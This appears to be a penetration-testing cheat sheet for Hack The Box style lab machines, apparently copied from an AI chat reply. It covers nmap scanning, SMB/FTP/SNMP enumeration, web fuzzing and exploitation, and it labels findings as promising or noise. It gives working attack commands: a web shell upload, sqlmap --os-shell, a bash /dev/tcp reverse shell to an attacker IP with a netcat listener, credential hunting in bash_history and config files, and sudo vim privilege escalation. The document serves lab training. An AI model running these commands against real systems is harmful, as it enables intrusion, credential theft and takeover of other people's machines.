Standard attack methodology:
Network scan - nmap all ports, service detection, OS detection Service enumeration - probe every open port, grab banners, versions Web enumeration (if applicable) - directory brute force, parameter fuzzing, tech stack identification Vulnerability identification - searchsploit for versions, CVE databases, misconfigurations Exploitation - get initial foothold Post-exploitation - lateral movement, privilege escalation, data exfiltration
NETWORK SCAN:¶
Quick initial scan¶
nmap -sC -sV -oA initial 10.10.11.123
Full port scan¶
nmap -p- --min-rate 5000 -oA full 10.10.11.123
Targeted service scan on found ports¶
nmap -sC -sV -p 22,80,443,3306,8080 -oA targeted 10.10.11.123
Promising:
Uncommon ports (8080, 8443, 3000, 5000, etc.) - custom apps, likely vulnerable Database ports exposed (3306 MySQL, 5432 Postgres, 27017 MongoDB) - direct access attempt Admin interfaces (5985 WinRM, 5900 VNC, 3389 RDP) SMB (139/445) on Windows - credential spraying, share enumeration
Noise:
Just port 22/SSH on Linux with recent version - usually not the entry point Port 80/443 showing default nginx/apache page - need deeper web enum Filtered ports - scanning waste of time
SERVICE ENUMERATION:¶
SMB¶
smbclient -L //10.10.11.123 -N smbmap -H 10.10.11.123 enum4linux -a 10.10.11.123
FTP¶
ftp 10.10.11.123
try anonymous:anonymous¶
SMTP¶
nc 10.10.11.123 25 VRFY root VRFY admin
SNMP¶
snmpwalk -v2c -c public 10.10.11.123
RPC¶
rpcclient -U "" 10.10.11.123 enumdomusers
Promising:
Anonymous FTP with write permissions - upload webshell SMB shares with readable/writable access - credentials, configuration files SNMP community string "public" works - extract user lists, running processes Banner says specific version with known CVE
Noise:
Service responds but no anonymous access, no version info SMB IPC$ share only (standard, no data) Generic banners (SSH-2.0-OpenSSH_8.2p1)
Web Enumeration¶
bash# Directory brute force gobuster dir -u http://10.10.11.123 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
Subdomain enumeration¶
gobuster vhost -u http://example.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Tech identification¶
whatweb http://10.10.11.123 curl -I http://10.10.11.123
Parameter fuzzing (if you found /admin or /api)¶
ffuf -u http://10.10.11.123/admin/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt Promising:
/admin, /manager, /phpmyadmin - login panels to brute force or exploit /uploads, /files, /backup - accessible files, potential upload Old PHP version in headers - likely exploitable Custom app (Node.js, Flask, Ruby) - higher chance of vulns than WordPress Error messages revealing paths/versions
Noise:
Standard /css, /js, /images directories /robots.txt with nothing interesting Default CMS pages with no apparent vuln
Vulnerability Identification¶
bash# Search exploits for specific versions searchsploit apache 2.4.49 searchsploit -m 50383 # download exploit
CVE lookup¶
google "jenkins 2.289 exploit" google "tomcat manager default credentials"
Check for default creds¶
creds.txt or /usr/share/seclists/Passwords/Default-Credentials/*
Misconfigurations¶
- Tomcat manager with tomcat:s3cret¶
- Jenkins without auth¶
- phpMyAdmin with root:¶
Promising:
Exact version match with RCE exploit in exploit-db Service running as root/admin (from nmap or banner) Default credentials work (admin:admin on Tomcat manager) File upload with no filtering Known CVE with public PoC code
Noise:
Vulnerabilities requiring local access when you're remote DoS exploits (you need RCE/shell) Theoretical vulns with no public exploit Patched versions that claim to be old (version spoofing)
Exploitation¶
bash# Web shell upload curl -F "file=@shell.php" http://10.10.11.123/upload.php
SQLi to RCE (if mysql)¶
sqlmap -u "http://10.10.11.123/page.php?id=1" --os-shell
Exploit public CVE¶
python3 exploit.py 10.10.11.123 10.10.14.15 4444
Reverse shell one-liner (after finding RCE)¶
bash -c 'bash -i >& /dev/tcp/10.10.14.15/4444 0>&1'
Listener¶
nc -lvnp 4444 Promising:
Shell connects back immediately - you have execution Web shell responds - RCE confirmed SQL injection dumps database - credentials found File inclusion loads /etc/passwd - LFI confirmed, can chain to RCE
Noise:
Exploit runs but no callback - firewall blocking, wrong target, patched SQL injection gets blocked by WAF Upload works but file gets deleted/filtered
Post-Exploitation¶
bash# Situational awareness whoami id hostname uname -a ip a
Find privilege escalation vectors¶
sudo -l find / -perm -4000 2>/dev/null # SUID binaries getcap -r / 2>/dev/null # capabilities cat /etc/crontab # scheduled tasks
Credentials hunting¶
cat /home//.bash_history grep -r "password" /var/www/html cat /var/www/html/config.php find / -name ".db" 2>/dev/null
Lateral movement (if multiple users)¶
ssh user2@localhost -i /home/user1/.ssh/id_rsa
Privilege escalation¶
If sudo -l shows (ALL) NOPASSWD: /usr/bin/vim¶
sudo vim -c ':!/bin/bash' Promising:
sudo -l shows NOPASSWD entry - instant root path SUID binary you can exploit (find, vim, etc.) - GTFOBins it Readable /etc/shadow - crack hashes offline DB config with root password - credential reuse SSH key for another user - lateral movement Cron job running as root with writable script - script modification
Noise:
SUID on standard binaries (/bin/ping, /usr/bin/passwd) - expected, not exploitable bash_history is empty - HISTFILE disabled No sudo rights at all Other users but can't read their directories
Key intuition builder: Most boxes have 1-2 actual exploit paths and 10+ rabbit holes. The signal is anything non-standard, outdated, or misconfigured. The noise is default, expected, secured.Claude is AI and can make mistakes. Please double-check responses.